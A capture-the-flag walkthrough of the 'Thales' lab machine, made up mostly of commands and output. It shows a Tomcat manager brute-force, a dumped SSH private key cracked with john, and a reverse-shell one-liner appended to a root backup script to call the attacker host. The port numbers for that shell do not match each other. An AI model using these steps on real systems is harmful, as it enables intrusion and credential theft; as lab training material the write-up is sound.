Thales

$ sudo nmap -sP 192.168.0.1/24  

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 13:46 CST
Nmap scan report for 192.168.0.1
Host is up (0.00041s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.103
Host is up (0.00018s latency).
MAC Address: 08:00:27:C1:0E:A0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.105
Host is up (0.20s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.106
Host is up (0.19s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.108
Host is up (0.12s latency).
MAC Address: 94:E2:3C:A7:02:C9 (Intel Corporate)
Nmap scan report for 192.168.0.109
Host is up (0.00089s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.107
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 8.14 seconds

sudo nmap -sV -p- -O 192.168.0.103

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 13:47 CST
Nmap scan report for 192.168.0.103
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
8080/tcp open     http    Apache Tomcat 9.0.52
MAC Address: 08:00:27:C1:0E:A0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.71 seconds

msf6 > search tomcat login

Matching Modules
================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/tomcat_mgr_login                   normal  No     Tomcat Application Manager Login Utility


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/tomcat_mgr_login

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
```bash
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                                                            no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.0.103

RHOSTS => 192.168.0.103

msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit 

[!] No active DB -- Credential data will not be saved!


[-] 192.168.0.103:8080 - LOGIN FAILED: root:toor (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: root:password1 (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: root:j2deployer (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: root:OvW*busr1 (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: root:kdsxc (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: root:owaspba (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: root:ADMIN (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: root:xampp (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.0.103:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[+] 192.168.0.103:8080 - Login Successful: tomcat:role1

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

nc -lvp 12345

listening on [any] 12345 ...
192.168.0.103: inverse host lookup failed: Unknown host
connect to [192.168.0.107] from (UNKNOWN) [192.168.0.103] 35954
python3 -c 'import pty;pty.spawn("/bin/bash")'

tomcat@miletus:/$ ls

bin    dev   initrd.img      lib64       mnt   root  snap      sys  var
boot   etc   initrd.img.old  lost+found  opt   run   srv       tmp  vmlinuz
cdrom  home  lib             media       proc  sbin  swap.img  usr  vmlinuz.old

tomcat@miletus:/$ cd /home/thales

tomcat@miletus:/home/thales$ ls

notes.txt  user.txt

tomcat@miletus:/home/thales$ cat notes.txt

I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
tomcat@miletus:/home/thales$ cat /usr/local/bin/backup.sh

cat /usr/local/bin/backup.sh

#!/bin/bash
####################################
#
# Backup to NFS mount script.
#
####################################

# What to backup. 
backup_files="/opt/tomcat/"

# Where to backup to.
dest="/var/backups"

# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"
date

# Long listing of files in $dest to check file sizes.
ls -lh $dest

tomcat@miletus:/home/thales$ cd .sh

tomcat@miletus:/home/thales/.ssh$ ls -la

total 16
drwxrwxrwx 2 thales thales 4096 Aug 16  2021 .
drwxr-xr-x 6 thales thales 4096 Oct 14  2021 ..
-rw-r--r-- 1 thales thales 1766 Aug 16  2021 id_rsa
-rw-r--r-- 1 thales thales  396 Aug 16  2021 id_rsa.pub

tomcat@miletus:/home/thales/.ssh$ cat id_rsa

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6103FE9ABCD5EF41F96C07F531922AAF

ZMlKhm2S2Cqbj+k3h8MgQFr6oG4CBKqF1NfT04fJPs1xbXe00aSdS+QgIbSaKWMh
+/ILeS/r8rFUt9isW2QAH7JYEWBgR4Z/9KSMSUd1aEyjxz7FpZj2cL1Erj9wK9ZA
InMmkm7xAKOWKwLTJeMS3GB4X9AX9ef/Ijmxx/cvvIauK5G2jPRyGSazMjK0QcwX
pkwnm4EwXPDiktkwzg15RwIhJdZBbrMj7WW9kt0CF9P754mChdIWzHrxYhCUIfWd
rHbDYTKmfL18LYhHaj9ZklkZjb8li8JIPvnJDcnLsCY+6X1xB9dqbUGGtSHNnHiL
rmrOSfI7RYt9gCgMtFimYRaS7gFuvZE/NmmIUJkH3Ccv1mIj3wT1TCtvREv+eKgf
/nj+3A6ZSQKFdlm22YZBilE4npxGOC03s81Rbvg90cxOhxYGTZMu/jU9ebUT2HAh
o1B972ZAWj3m5sDZRiQ+wTGqwFBFxF9EPia6sRM/tBKaigIElDSyvz1C46mLTmBS
f8KNwx5rNXkNM7dYX1Sykg0RreKO1weYAA0yQSHCY+iJTIf81CuDcgOIYRywHIPU
9rI20K910cLLo+ySa7O4KDcmIL1WCnGbrD4PwupQ68G2YG0ZOOIrwE9efkpwXPCR
Vi2TO2Zut8x6ZEFjz4d3aWIzWtf1IugQrsmBK+akRLBPjQVy/LyApqvV+tYfQelV
v9pEKMxR5f1gFmZpTbZ6HDHmEO4Y7gXvUXphjW5uijYemcyGx0HSqCSER7y7+phA
h0NEJHSBSdMpvoS7oSIxC0qe4QsSwITYtJs5fKuvJejRGpoh1O2HE+etITXlFffm
2J1fdQgPo+qbOVSMGmkITfTBDh1ODG7TZYAq8OLyEh/yiALoZ8T1AEeAJev5hON5
PUUP8cxX4SH43lnsmIDjn8M+nEsMEWVZzvaqo6a2Sfa/SEdxq8ZIM1Nm8fLuS8N2
GCrvRmCd7H+KrMIY2Y4QuTFR1etulbBPbmcCmpsXlj496bE7n5WwILLw3Oe4IbZm
ztB5WYAww6yyheLmgU4WkKMx2sOWDWZ/TSEP0j9esOeh2mOt/7Grrhn3xr8zqnCY
i4utbnsjL4U7QVaa+zWz6PNiShH/LEpuRu2lJWZU8mZ7OyUyx9zoPRWEmz/mhOAb
jRMSyfLNFggfzjswgcbwubUrpX2Gn6XMb+MbTY3CRXYqLaGStxUtcpMdpj4QrFLP
eP/3PGXugeJi8anYMxIMc3cJR03EktX5Cj1TQRCjPWGoatOMh02akMHvVrRKGG1d
/sMTTIDrlYlrEAfQXacjQF0gzqxy7jQaUc0k4Vq5iWggjXNV2zbR/YYFwUzgSjSe
SNZzz4AMwRtlCWxrdoD/exvCeKWuObPlajTI3MaUoxPjOvhQK55XWIcg+ogo9X5x
B8XDQ3qW6QJLFELXpAnl5zW5cAHXAVzCp+VtgQyrPU04gkoOrlrj5u22UU8giTdq
nLypW+J5rGepKGrklOP7dxEBbQiy5XDm/K/22r9y+Lwyl38LDF2va22szGoW/oT+
8eZHEOYASwoSKng9UEhNvX/JpsGig5sAamBgG1sV9phyR2Y9MNb/698hHyULD78C
-----END RSA PRIVATE KEY-----

tomcat@miletus:/home/thales/.ssh$ su thales

$ vim id_rsa

/usr/share/john/ssh2john.py id_rsa > crack.txt

$ cat crack.txt

id_rsa:$sshng$1$16$6103FE9ABCD5EF41F96C07F531922AAF$1200$64c94a866d92d82a9b8fe93787c320405afaa06e0204aa85d4d7d3d387c93ecd716d77b4d1a49d4be42021b49a296321fbf20b792febf2b154b7d8ac5b64001fb25811606047867ff4a48c494775684ca3c73ec5a598f670bd44ae3f702bd640227326926ef100a3962b02d325e312dc60785fd017f5e7ff2239b1c7f72fbc86ae2b91b68cf4721926b33232b441cc17a64c279b81305cf0e292d930ce0d7947022125d6416eb323ed65bd92dd0217d3fbe7898285d216cc7af162109421f59dac76c36132a67cbd7c2d88476a3f599259198dbf258bc2483ef9c90dc9cbb0263ee97d7107d76a6d4186b521cd9c788bae6ace49f23b458b7d80280cb458a6611692ee016ebd913f366988509907dc272fd66223df04f54c2b6f444bfe78a81ffe78fedc0e994902857659b6d986418a51389e9c46382d37b3cd516ef83dd1cc4e8716064d932efe353d79b513d87021a3507def66405a3de6e6c0d946243ec131aac05045c45f443e26bab1133fb4129a8a02049434b2bf3d42e3a98b4e60527fc28dc31e6b35790d33b7585f54b2920d11ade28ed70798000d324121c263e8894c87fcd42b83720388611cb01c83d4f6b236d0af75d1c2cba3ec926bb3b828372620bd560a719bac3e0fc2ea50ebc1b6606d1938e22bc04f5e7e4a705cf091562d933b666eb7cc7a644163cf87776962335ad7f522e810aec9812be6a444b04f8d0572fcbc80a6abd5fad61f41e955bfda4428cc51e5fd601666694db67a1c31e610ee18ee05ef517a618d6e6e8a361e99cc86c741d2a8248447bcbbfa984087434424748149d329be84bba122310b4a9ee10b12c084d8b49b397cabaf25e8d11a9a21d4ed8713e7ad2135e515f7e6d89d5f75080fa3ea9b39548c1a69084df4c10e1d4e0c6ed365802af0e2f2121ff28802e867c4f500478025ebf984e3793d450ff1cc57e121f8de59ec9880e39fc33e9c4b0c116559cef6aaa3a6b649f6bf484771abc648335366f1f2ee4bc376182aef46609dec7f8aacc218d98e10b93151d5eb6e95b04f6e67029a9b17963e3de9b13b9f95b020b2f0dce7b821b666ced079598030c3acb285e2e6814e1690a331dac3960d667f4d210fd23f5eb0e7a1da63adffb1abae19f7c6bf33aa70988b8bad6e7b232f853b41569afb35b3e8f3624a11ff2c4a6e46eda5256654f2667b3b2532c7dce83d15849b3fe684e01b8d1312c9f2cd16081fce3b3081c6f0b9b52ba57d869fa5cc6fe31b4d8dc245762a2da192b7152d72931da63e10ac52cf78fff73c65ee81e262f1a9d833120c737709474dc492d5f90a3d534110a33d61a86ad38c874d9a90c1ef56b44a186d5dfec3134c80eb95896b1007d05da723405d20ceac72ee341a51cd24e15ab98968208d7355db36d1fd8605c14ce04a349e48d673cf800cc11b65096c6b7680ff7b1bc278a5ae39b3e56a34c8dcc694a313e33af8502b9e57588720fa8828f57e7107c5c3437a96e9024b1442d7a409e5e735b97001d7015cc2a7e56d810cab3d4d38824a0eae5ae3e6edb6514f2089376a9cbca95be279ac67a9286ae494e3fb7711016d08b2e570e6fcaff6dabf72f8bc32977f0b0c5daf6b6daccc6a16fe84fef1e64710e6004b0a122a783d50484dbd7fc9a6c1a2839b006a60601b5b15f6987247663d30d6ffebdf211f250b0fbf02

$ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:01:28 5.16% (ETA: 17:12:47) 0g/s 9631p/s 9631c/s 9631C/s mustang57..music678
0g 0:00:01:30 5.26% (ETA: 17:12:54) 0g/s 9581p/s 9581c/s 9581C/s maxpup..maxdrive
0g 0:00:01:31 5.30% (ETA: 17:12:58) 0g/s 9555p/s 9555c/s 9555C/s maihoney..mahisaon
0g 0:00:01:52 6.52% (ETA: 17:12:59) 0g/s 9471p/s 9471c/s 9471C/s Acura..ATREYUTLV
0g 0:00:02:28 18.41% (ETA: 16:57:45) 0g/s 19301p/s 19301c/s 19301C/s volley2u..volkyverde
vodka06          (id_rsa)     
1g 0:00:02:28 DONE (2022-04-20 16:46) 0.006747g/s 19296p/s 19296c/s 19296C/s vodka411..voddka
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```bash
Password: vodka06

thales@miletus:~$ cat user.txt

a837c0b5d2a8a07225fd9905f5a0e9c4

thales@miletus:~$ cd /usr/local/bin

thales@miletus:/usr/local/bin$ ls

backup.sh

thales@miletus:/usr/local/bin$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 192.168.0.107 2022 >/tmp/f" >> backup.sh

thales@miletus:/usr/local/bin$ cat backup.sh
cat backup.sh
#!/bin/bash
####################################
#
# Backup to NFS mount script.
#
####################################

# What to backup. 
backup_files="/opt/tomcat/"

# Where to backup to.
dest="/var/backups"

# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"
date

# Long listing of files in $dest to check file sizes.
ls -lh $dest
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 192.168.0.107 20222 >/tmp/f
thales@miletus:/usr/local/bin$ 

nc -lvnp 1235

```bash
listening on [any] 1235 ...
connect to [192.168.0.107] from (UNKNOWN) [192.168.0.103] 38580
/bin/sh: 0: can't access tty; job control turned off
# # # # # # # # # ls

root.txt
# cat root.txt

3a1c85bebf8833b0ecae900fb8598b17